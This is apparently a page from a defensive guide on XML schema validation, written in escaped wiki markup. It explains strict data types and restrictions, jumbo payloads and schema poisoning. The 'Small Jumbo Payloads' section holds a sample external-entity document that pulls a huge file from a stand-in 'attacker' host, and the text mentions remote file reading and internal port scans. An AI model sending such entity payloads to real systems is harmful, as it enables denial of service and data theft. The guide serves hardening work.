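   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
       &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
        &amp;lt;xs:minLength value=&amp;quot;1&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:maxLength value=&amp;quot;256&amp;quot;/&amp;gt;&lt;br /&gt;
       &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
     &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;age&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
       &amp;lt;xs:restriction base=&amp;quot;xs:nonNegativeInteger&amp;quot;&amp;gt;&lt;br /&gt;
        &amp;lt;xs:pattern value=&amp;quot;[0-9]{1,3}&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:maxInclusive value=&amp;quot;150&amp;quot;/&amp;gt;&lt;br /&gt;
       &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
     &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The &amp;lt;tt&amp;gt;pattern&amp;lt;/tt&amp;gt; facet bounds the lexical length of &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;, since leading zeros would otherwise let an arbitrarily long string satisfy the numeric limit.&lt;br /&gt;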
&lt;br /&gt;
== Improper Data Validation == &lt;br /&gt;
When schemas are insecurely defined and do not provide strict rules, they may expose the application to diverse situations. The result of this could be the disclosure of internal errors or documents that hit the application’s functionality with unexpected values.&lt;br /&gt;
&lt;br /&gt;
=== String Data Types ===&lt;br /&gt;
If you need to use a hexadecimal value, there is no point in defining it as a string that will later be restricted to the 16 hexadecimal characters; a data type designed for that value is the better choice. To exemplify this scenario, when using XML encryption some values must be encoded using base64. This is the schema definition of how these values should look:&lt;br /&gt;
 &amp;lt;element name=&amp;quot;CipherData&amp;quot; type=&amp;quot;xenc:CipherDataType&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;complexType name=&amp;quot;CipherDataType&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;choice&amp;gt;&lt;br /&gt;
    &amp;lt;element name=&amp;quot;CipherValue&amp;quot; type=&amp;quot;'''base64Binary'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;element ref=&amp;quot;xenc:CipherReference&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/choice&amp;gt;&lt;br /&gt;
  &amp;lt;/complexType&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema defines the element &amp;lt;tt&amp;gt;CipherValue&amp;lt;/tt&amp;gt; as a base64 data type. As an example, the IBM WebSphere DataPower SOA Appliance allowed any type of characters within this element after a valid base64 value, and considered the result valid. The first portion of this data was properly checked as a base64 value, but the remaining characters could be anything else (including other sub-elements of the &amp;lt;tt&amp;gt;CipherData&amp;lt;/tt&amp;gt; element). The restrictions were only partially enforced for the element, which suggests that the information was checked by application code instead of being validated against the proposed sample schema.&lt;br /&gt;
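&lt;br /&gt;
Returning to the hexadecimal case, a sketch of the typed alternative could look like the following. The element name &amp;lt;tt&amp;gt;digest&amp;lt;/tt&amp;gt; and the length of 32 are hypothetical, chosen only for illustration:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;digest&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;'''xs:hexBinary'''&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:length value=&amp;quot;32&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
For &amp;lt;tt&amp;gt;hexBinary&amp;lt;/tt&amp;gt;, the &amp;lt;tt&amp;gt;length&amp;lt;/tt&amp;gt; facet counts octets, so a value of 32 corresponds to 64 hexadecimal characters.&lt;br /&gt;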
&lt;br /&gt;
=== Numeric Data Types ===&lt;br /&gt;
Defining the correct data type for numbers can be more complex since there are more options than there are for strings. &lt;br /&gt;
&lt;br /&gt;
==== Negative and Positive Restrictions ====&lt;br /&gt;
XML Schema numeric data types can include different ranges of numbers. They could include:&lt;br /&gt;
* '''negativeInteger''': Only negative numbers&lt;br /&gt;
* '''nonNegativeInteger''': Positive numbers and the zero value&lt;br /&gt;
* '''positiveInteger''': Only positive numbers&lt;br /&gt;
* '''nonPositiveInteger''': Negative numbers and the zero value&lt;br /&gt;
The following sample document defines an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; for a product, a &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;, and a &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; value that is under the control of an attacker:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;1&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
  &amp;lt;quantity&amp;gt;'''1'''&amp;lt;/quantity&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
To avoid repeating old errors, an XML schema may be defined to prevent processing the incorrect structure in cases where an attacker wants to introduce additional elements:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;&amp;lt;nowiki&amp;gt;http://www.w3.org/2001/XMLSchema&amp;lt;/nowiki&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;'''xs:integer'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Limiting &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; to an integer data type will avoid any unexpected characters. Once the application receives the previous message, it may calculate the final price by doing &amp;lt;tt&amp;gt;price*quantity&amp;lt;/tt&amp;gt;. However, since this data type allows negative values, an attacker who provides a negative number might cause a negative result on the user’s account. Using &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; instead of &amp;lt;tt&amp;gt;integer&amp;lt;/tt&amp;gt; avoids that logic vulnerability.&lt;br /&gt;
&lt;br /&gt;
==== Divide by Zero ====&lt;br /&gt;
Whenever user-controlled values are used as denominators in a division, developers should disallow the number zero. In cases where the value zero is used for division in XSLT, the error &amp;lt;tt&amp;gt;FOAR0001&amp;lt;/tt&amp;gt; will occur. Other applications may throw other exceptions and the program may crash. There are data types for XML schemas that specifically exclude the zero value. For example, in cases where negative values and zero are not considered valid, the schema could specify the data type &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; for the element.&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;'''xs:positiveInteger'''&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The element &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; is now restricted to positive integers. This means that only values greater than zero will be considered valid. If a less restrictive data type is used instead, a denominator of zero may trigger an error.&lt;br /&gt;
&lt;br /&gt;
==== Special Values: Infinity and Not a Number (NaN) ====&lt;br /&gt;
The data types &amp;lt;tt&amp;gt;float&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;double&amp;lt;/tt&amp;gt; contain real numbers and some special values: &amp;lt;tt&amp;gt;-Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;-INF&amp;lt;/tt&amp;gt;, &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt;, and &amp;lt;tt&amp;gt;+Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;INF&amp;lt;/tt&amp;gt;. These possibilities may be useful to express certain values, but they are sometimes misused. The problem is that these data types are commonly chosen for values that should only ever be real numbers, such as prices. This is a common error seen in other programming languages, not solely restricted to these technologies.&lt;br /&gt;
Not considering the whole spectrum of possible values for a data type could make underlying applications fail. If the special values &amp;lt;tt&amp;gt;Infinity&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt; are not required and only real numbers are expected, the data type &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt; is recommended:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;&amp;lt;nowiki&amp;gt;http://www.w3.org/2001/XMLSchema&amp;lt;/nowiki&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;'''xs:decimal'''&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
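With the &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt; data type, the values Infinity and NaN are not valid for &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;, so validation rejects them before they can trigger errors in the application. An attacker can exploit this issue when a data type that allows those values is used instead.&lt;br /&gt;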
&lt;br /&gt;
=== General Data Restrictions ===&lt;br /&gt;
After selecting the appropriate data type, developers may apply additional restrictions. Sometimes only a certain subset of values within a data type will be considered valid:&lt;br /&gt;
&lt;br /&gt;
==== Prefixed Values ====&lt;br /&gt;
Certain types of values should be restricted to specific sets: traffic lights will have only three types of colors, only 12 months are available, and so on. The schema can put these restrictions in place for each element or attribute. This is the ideal whitelist scenario for an application: only specific values will be accepted. Such a constraint is called &amp;lt;tt&amp;gt;enumeration&amp;lt;/tt&amp;gt; in XML schema. The following example restricts the contents of the element &amp;lt;tt&amp;gt;month&amp;lt;/tt&amp;gt; to 12 possible values:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;month&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;January&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;February&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;March&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;April&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;May&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;June&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;July&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;August&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;September&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;October&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;November&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;December&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
By limiting the month element’s value to any of the previous values, the application will not be manipulating random strings.&lt;br /&gt;
&lt;br /&gt;
==== Ranges ====&lt;br /&gt;
Software applications, databases, and programming languages normally store information within specific ranges. Whenever using an element or an attribute in locations where certain specific sizes matter (to avoid overflows or underflows), it would be logical to check whether the data length is considered valid. The following schema could constrain a name using a minimum and a maximum length to avoid unusual scenarios:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''minLength''' value=&amp;quot;3&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''maxLength''' value=&amp;quot;256&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
In cases where valid values must have one specific length (let's say 8), the &amp;lt;tt&amp;gt;length&amp;lt;/tt&amp;gt; restriction can be specified as follows:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''length''' value=&amp;quot;8&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
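&lt;br /&gt;
Numeric values can be bounded in a similar way. As a sketch, assuming a hypothetical &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; element that should accept between 1 and 100 items (both limits are illustrative), the restrictions &amp;lt;tt&amp;gt;minInclusive&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;maxInclusive&amp;lt;/tt&amp;gt; limit the value range:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;quantity&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:integer&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''minInclusive''' value=&amp;quot;1&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''maxInclusive''' value=&amp;quot;100&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;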
&lt;br /&gt;
==== Patterns ====&lt;br /&gt;
Certain elements or attributes may follow a specific syntax. You can add &amp;lt;tt&amp;gt;pattern&amp;lt;/tt&amp;gt; restrictions when using XML schemas. When you want to ensure that the data complies with a specific pattern, you can create a specific definition for it. Social security numbers (SSN) may serve as a good example; they must use a specific set of characters, a specific length, and a specific &amp;lt;tt&amp;gt;pattern&amp;lt;/tt&amp;gt;:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;SSN&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:token&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''pattern''' value=&amp;quot;[0-9]{3}-[0-9]{2}-[0-9]{4}&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Only numbers between &amp;lt;tt&amp;gt;000-00-0000&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;999-99-9999&amp;lt;/tt&amp;gt; will be allowed as values for an SSN.&lt;br /&gt;
&lt;br /&gt;
==== Assertions ====&lt;br /&gt;
Assertion components, introduced in XML Schema 1.1, constrain the existence and values of related elements and attributes on XML schemas. An element or attribute will be considered valid with regard to an assertion only if the test evaluates to true without raising any error. The variable &amp;lt;tt&amp;gt;$value&amp;lt;/tt&amp;gt; can be used to reference the contents of the value being analyzed.&lt;br /&gt;
The ''Divide by Zero'' section above referenced the potential consequences of using data types containing the zero value for denominators, proposing a data type containing only positive values. An opposite example would consider valid the entire range of numbers except zero. To avoid disclosing potential errors, values could be checked using an &amp;lt;tt&amp;gt;assertion&amp;lt;/tt&amp;gt; disallowing the number zero:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:integer&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''assertion''' test=&amp;quot;$value != 0&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The assertion guarantees that the &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; will not contain the value zero as a valid number and also allows negative numbers to be a valid denominator.&lt;br /&gt;
&lt;br /&gt;
==== Occurrences ====&lt;br /&gt;
Not defining a maximum number of occurrences can have serious consequences when the application receives an extreme number of items to process. Two attributes specify minimum and maximum limits: &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt;. The default value for both the &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; attributes is &amp;lt;tt&amp;gt;1&amp;lt;/tt&amp;gt;, but certain elements may require other values. For instance, if a value is optional, it could have a &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; of 0, and if there is no limit on the maximum number, it could have a &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; of &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;, as in the following example:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;&amp;lt;nowiki&amp;gt;http://www.w3.org/2001/XMLSchema&amp;lt;/nowiki&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;operation&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;buy&amp;quot; '''maxOccurs'''=&amp;quot;'''unbounded'''&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
       &amp;lt;xs:all&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
       &amp;lt;/xs:all&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
     &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema includes a root element named &amp;lt;tt&amp;gt;operation&amp;lt;/tt&amp;gt;, which can contain an unlimited (&amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;) number of &amp;lt;tt&amp;gt;buy&amp;lt;/tt&amp;gt; elements. This is a common finding, since developers do not normally want to restrict the maximum number of occurrences. Applications using limitless occurrences should test what happens when they receive an extremely large number of elements to be processed. Since computational resources are limited, the consequences should be analyzed and eventually a maximum number ought to be used instead of an &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt; value.&lt;br /&gt;
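&lt;br /&gt;
A bounded variant of the &amp;lt;tt&amp;gt;buy&amp;lt;/tt&amp;gt; declaration might look like the following sketch, which would take the place of the unbounded declaration inside the sequence. The limit of 100 is an arbitrary assumption; the right value depends on what the application can process safely:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;buy&amp;quot; '''maxOccurs'''=&amp;quot;'''100'''&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:all&amp;gt;&lt;br /&gt;
    &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:all&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;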
&lt;br /&gt;
== Jumbo Payloads ==&lt;br /&gt;
Sending an XML document of 1GB requires only a second of server processing and might not be worth consideration as an attack. Instead, an attacker would look for a way to minimize the CPU and traffic used to generate this type of attack, compared to the overall amount of server CPU or traffic used to handle the requests.&lt;br /&gt;
&lt;br /&gt;
=== Traditional Jumbo Payloads ===&lt;br /&gt;
There are two primary methods to make a document larger than normal:&lt;br /&gt;
* Depth attack: using a huge number of elements, element names, and/or element values.&lt;br /&gt;
* Width attack: using a huge number of attributes, attribute names, and/or attribute values.&lt;br /&gt;
In most cases, the overall result will be a huge document. This is a short example of what this looks like:&lt;br /&gt;
 &amp;lt;SOAPENV:ENVELOPE XMLNS:SOAPENV=&amp;quot;&amp;lt;nowiki&amp;gt;HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/&amp;lt;/nowiki&amp;gt;&amp;quot; XMLNS:EXT=&amp;quot;&amp;lt;nowiki&amp;gt;HTTP://COM/IBM/WAS/WSSAMPLE/SEI/ECHO/B2B/EXTERNAL&amp;lt;/nowiki&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;SOAPENV:HEADER '''LARGENAME1'''=&amp;quot;'''LARGEVALUE'''&amp;quot; '''LARGENAME2'''=&amp;quot;'''LARGEVALUE2'''&amp;quot; '''LARGENAME3'''=&amp;quot;'''LARGEVALUE3'''&amp;quot; …&amp;gt;&lt;br /&gt;
  ...&lt;br /&gt;
&lt;br /&gt;
=== &amp;quot;Small&amp;quot; Jumbo Payloads ===&lt;br /&gt;
The following example is a very small document, but the results of processing this could be similar to those of processing traditional jumbo payloads. The purpose of such a small payload is that it allows an attacker to send many documents fast enough to make the application consume most or all of the available resources:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY '''file''' SYSTEM &amp;quot;'''&amp;lt;nowiki&amp;gt;http://attacker/huge.xml&amp;lt;/nowiki&amp;gt;'''&amp;quot; &amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;file;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Schema Poisoning ==&lt;br /&gt;
When an attacker is capable of introducing modifications to a schema, there could be multiple high-risk consequences. In particular, the effect of these consequences will be more dangerous if the schemas are using DTD (e.g., file retrieval, denial of service). An attacker could exploit this type of vulnerability in numerous scenarios, always depending on the location of the schema. &lt;br /&gt;
&lt;br /&gt;
=== Local Schema Poisoning ===&lt;br /&gt;
Local schema poisoning happens when schemas are available in the same host, whether or not the schemas are embedded in the same XML document.&lt;br /&gt;
&lt;br /&gt;
==== Embedded Schema ====&lt;br /&gt;
The most trivial type of schema poisoning takes place when the schema is defined within the same XML document. Consider the following, unknowingly vulnerable example provided by the W3C:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE note [&lt;br /&gt;
  &amp;lt;!ELEMENT note (to,from,heading,body)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT to (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT from (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT heading (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT body (#PCDATA)&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
All restrictions on the &amp;lt;tt&amp;gt;note&amp;lt;/tt&amp;gt; element could be removed or altered, allowing the sending of any type of data to the server. Furthermore, if the server is processing external entities, the attacker could use the schema, for example, to remotely read files from the server. This type of schema only serves as a suggestion for sending a document, and it must contain a way to check the embedded schema integrity to be used safely.&lt;br /&gt;
Attacks through embedded schemas are commonly used to exploit external entity expansions. Embedded XML schemas can also assist in port scans of internal hosts or brute force attacks.&lt;br /&gt;
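&lt;br /&gt;
One way to keep an attacker-supplied embedded schema from being processed at all is to refuse documents that carry a DOCTYPE. The following is a minimal sketch, assuming the JDK's bundled JAXP parser (which honors the Xerces &amp;lt;tt&amp;gt;disallow-doctype-decl&amp;lt;/tt&amp;gt; feature); the class &amp;lt;tt&amp;gt;NoDoctypeParser&amp;lt;/tt&amp;gt; and its methods are hypothetical names used only for illustration:&lt;br /&gt;

```java
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;

// Hypothetical helper: parses XML but refuses any document carrying a DOCTYPE.
final class NoDoctypeParser {

    static Document parse(String xml) throws Exception {
        DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
        // Xerces-style feature (assumed to be supported by the parser in use):
        // any DOCTYPE declaration becomes a fatal parse error.
        factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        DocumentBuilder builder = factory.newDocumentBuilder();
        return builder.parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
    }

    // Returns true when the parser refused the document.
    static boolean isRejected(String xml) {
        try {
            parse(xml);
            return false;
        } catch (Exception e) {
            return true;
        }
    }
}
```

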